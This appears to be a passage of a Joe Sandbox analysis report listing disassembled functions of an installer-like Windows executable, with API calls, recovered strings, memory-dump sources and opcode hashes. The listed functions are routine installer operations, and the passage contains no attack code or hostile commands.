                                                                                                                                                                                                                                  • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                                                                                                                  • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047A218 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                                                                                                                                                  • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                                                                                                  • API String ID: 3535843008-1938159461
                                                                                                                                                                                                                                  • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                                                                                                                  • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0048358C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveForeground
                                                                                                                                                                                                                                  • String ID: Will not restart Windows automatically.
                                                                                                                                                                                                                                  • API String ID: 307657957-4169339592
                                                                                                                                                                                                                                  • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                                                                                                                  • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004763AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                                                                                                                                                  • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Extracting temporary file: , xrefs: 004763EC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileTime$Local
                                                                                                                                                                                                                                  • String ID: Extracting temporary file:
                                                                                                                                                                                                                                  • API String ID: 791338737-4171118009
                                                                                                                                                                                                                                  • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                                                                                                                  • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046CC0C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                                                                                                                  • API String ID: 0-1974262853
                                                                                                                                                                                                                                  • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                                                                                                                  • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478E98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00478F10
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                  • API String ID: 47109696-1598650737
                                                                                                                                                                                                                                  • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                                                                                                                                  • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00450168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExecuteMessageSendShell
                                                                                                                                                                                                                                  • String ID: open
                                                                                                                                                                                                                                  • API String ID: 812272486-2758837156
                                                                                                                                                                                                                                  • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                                                                                                                                  • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                  • API String ID: 893404051-4251816714
                                                                                                                                                                                                                                  • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                                                                                                                                  • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                                  • String ID: )
                                                                                                                                                                                                                                  • API String ID: 2227675388-1084416617
                                                                                                                                                                                                                                  • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                                                                                                                                  • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00496B2E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window
                                                                                                                                                                                                                                  • String ID: /INITPROCWND=$%x $@
                                                                                                                                                                                                                                  • API String ID: 2353593579-4169826103
                                                                                                                                                                                                                                  • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                                                                                                                                  • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00447414 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                                                                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                                                                                                                  • API String ID: 3952431833-1023667238
                                                                                                                                                                                                                                  • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                                                                                                                                  • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004963A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                                                                                                                                                    • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                                                                                                                  • String ID: 0nI
                                                                                                                                                                                                                                  • API String ID: 3798668922-794067871
                                                                                                                                                                                                                                  • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                                                                                                                                  • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

